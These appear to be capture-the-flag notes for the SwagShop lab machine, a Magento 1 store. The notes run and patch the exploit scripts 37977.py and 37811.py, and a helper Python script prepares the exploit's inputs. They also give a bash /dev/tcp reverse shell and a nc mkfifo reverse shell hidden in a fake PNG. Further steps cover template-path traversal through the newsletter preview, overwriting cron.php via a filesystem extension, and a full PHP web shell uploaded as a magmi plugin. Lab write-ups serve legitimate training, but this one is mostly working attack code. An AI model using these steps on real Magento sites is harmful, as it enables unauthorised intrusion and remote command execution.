php magescan.phar scan:all 10.x.x.x
searchsploit magento
Magento eCommerce - Remote Code Execution (37977.py)
vi 37977.py
target = "http://10.x.x.x/"
target_url = target + "index.php/admin/Cms_Wysiwyg/directive/index/"
python 37977.py
http://swagshop.htb/index.php/admin/
The exploit creates an admin account for us; log in with:
forme:forme
-------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution
vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...' ..copied from the <install><date> value in app/etc/local.xml
-------------------
Errors:
ippsec got past them by passing the full admin path as the target (he had renamed the script exec.py):
python exec.py http://10.x.x.x/index.php/admin/ 'whoami'
-------------------
Other bloggers also patched the mechanize login lookup to the real form field names:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password
-------------------
More errors; the dashboard report period in the request had to be changed from 72 to 2y:
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
-------------------
python 37811.py http://$IP "whoami" ..error
python 37811.py http://$IP/index.php/admin/ "whoami" ..better
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"
nc -nvlp 9001 ..listener port must match the one in the payload
whoami
www-data
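The three edits above to 37811.py (install date, target URL form, login field names) are easy to get wrong by hand. The helpers below, an added example and not code from the exploit or from this page, pull the install date out of a constructed app/etc/local.xml excerpt, normalise any target to the .../index.php/admin/ form that worked, and list the input names in a constructed copy of the admin login form so the mechanize `find_control` calls address the right fields. All sample data is constructed; the date and key values are placeholders.

```python
"""Helpers for preparing 37811.py. Added example; sample inputs are constructed."""
import xml.etree.ElementTree as ET
from html.parser import HTMLParser
from urllib.parse import urlsplit, urlunsplit

# Constructed excerpt of app/etc/local.xml (date and key are placeholders).
SAMPLE_LOCAL_XML = """<?xml version="1.0"?>
<config>
    <global>
        <install>
            <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>
        </install>
        <crypt>
            <key><![CDATA[00000000000000000000000000000000]]></key>
        </crypt>
    </global>
</config>
"""

# Constructed excerpt of the Magento 1 admin login form; note the field names.
SAMPLE_LOGIN_HTML = """
<form method="post" action="/index.php/admin/" id="loginForm">
  <input type="text" id="username" name="login[username]" value="" class="required-entry">
  <input type="password" id="login" name="login[password]" class="required-entry">
  <input name="form_key" type="hidden" value="CONSTRUCTED">
  <input type="submit" class="form-button" value="Login" title="Login">
</form>
"""


def install_date(local_xml: str) -> str:
    """Text of /config/global/install/date, the value 37811.py's install_date needs."""
    root = ET.fromstring(local_xml)
    node = root.find("./global/install/date")
    if node is None or not node.text:
        raise ValueError("no <install><date> in local.xml")
    return node.text.strip()


def admin_url(target: str) -> str:
    """Rewrite a bare host, /index.php or /index.php/admin target into the .../index.php/admin/ form."""
    parts = urlsplit(target)
    path = parts.path.rstrip("/")
    for suffix in ("/index.php/admin", "/index.php"):
        if path.endswith(suffix):
            path = path[: -len(suffix)]
            break
    return urlunsplit((parts.scheme, parts.netloc, path + "/index.php/admin/", "", ""))


class _InputNames(HTMLParser):
    """Collect the name attribute of every <input> in the page."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            name = dict(attrs).get("name")
            if name:
                self.names.append(name)


def login_field_names(html: str) -> list:
    """Input names on the login form: these, not 'username'/'password', go into find_control()."""
    parser = _InputNames()
    parser.feed(html)
    return parser.names


if __name__ == "__main__":
    print("install_date =", repr(install_date(SAMPLE_LOCAL_XML)))
    print("target       =", admin_url("http://10.x.x.x"))
    print("login fields =", login_field_names(SAMPLE_LOGIN_HTML))
```

Paste the printed install_date into the script verbatim (the exploit compares it as a string), and use the normalised URL as the first argument; the field list is what the `login[username]` / `login[password]` patch above is matching.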
---------------
http://$IP/index.php/admin/
Login with Admin
System > Magento Connect > Magento Connection Manager
Check Box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz
Upload!
Download:
http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz
---------------
System > Filesystem > IDE
Edit cron.php (in the Magento web root)
Replace its contents with a PHP web shell
Get your shell:
http://10.x.x.x/cron.php
Submit a python reverse shell through the web shell
nc -nvlp 4444
whoami
www-data
http://swagshop.htb/index.php/admin/
Login with Admin
-------------------
Create the "png" (really a PHP file with a .png name):
echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png
-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"
-------------------
Catalog > Manage Categories > Add New Category
Thumbnail Image: Browse "shell.php.png", then Save Category
http://10.x.x.x/media/catalog/category/shell.php.png ..confirm the file was uploaded
-------------------
Newsletter > Edit Newsletter Template
Add our code block to the "Template Content"
Save Template
Preview Template (to execute)
{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}
-------------------
Previewing the template renders the block: with Allow Symlinks on, Magento skips its check that the template path stays inside the theme's template directory, so the traversal path is included and the uploaded file runs as PHP
nc -nvlp 4444
whoami
www-data
http://$IP/magmi/web/magmi.php
http://$IP/index.php/admin/Cms_Wysiwyg/directive/index/
http://$IP/index.php/admin/Cms_Wysiwyg/directive/key/905d7.../
-------------------
vi evil.php
<?php
// Minimal web shell: always print the command form, then run whatever was POSTed.
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
if (isset($_POST['command']) && function_exists('shell_exec')) {
    $output = shell_exec($_POST['command']);
    echo "<pre>$output</pre>";
}
?>
-------------------
zip evil.zip evil.php
Upload new plugins:
click on "choose file" > evil.zip
-------------------
Execute:
http://10.x.x.x/magmi/plugins/evil.php